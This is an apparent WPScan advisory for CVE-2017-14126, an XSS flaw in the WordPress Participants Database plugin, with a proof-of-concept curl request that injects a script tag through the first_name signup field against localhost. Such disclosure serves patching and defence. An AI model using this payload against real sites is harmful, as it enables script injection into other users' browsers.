Participants Database <= 1.7.5.9 - Cross-Site Scripting



Description
Cross site scripting (XSS) vulnerability in the Wordpress Participants
Database plugin 1.7.59 allows attackers to inject arbitrary javascript via
the Name parameter.
Proof of Concept
curl -k -F action=signup -F subsource=participants-database -F
shortcode_page=/?page_id=1 -F thanks_page=/?page_id=1 -F instance_index=2
-F pdb_data_keys=1.2.9.10 -F session_hash=0123456789 -F
first_name=<script>alert("1");</script> -F last_name=a -F email=a@a.com -F
mailing_list=No -F submit_button=Submit http://localhost/?page_id=1

Affects Plugin

fixed in version 1.7.5.10

References

CVE 2017-14126
URL https://limbenjamin.com/articles/cve-2017-14126-participants-database-xss.html

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Benjamin Lim
Submitter Website https://limbenjamin.com
Views 4472
Verified No
WPVDB ID 8896

Timeline

Publicly Published 2017-09-06 (about 2 years ago)
Added 2017-09-06 (about 2 years ago)
Last Updated 2017-09-06 (about 2 years ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin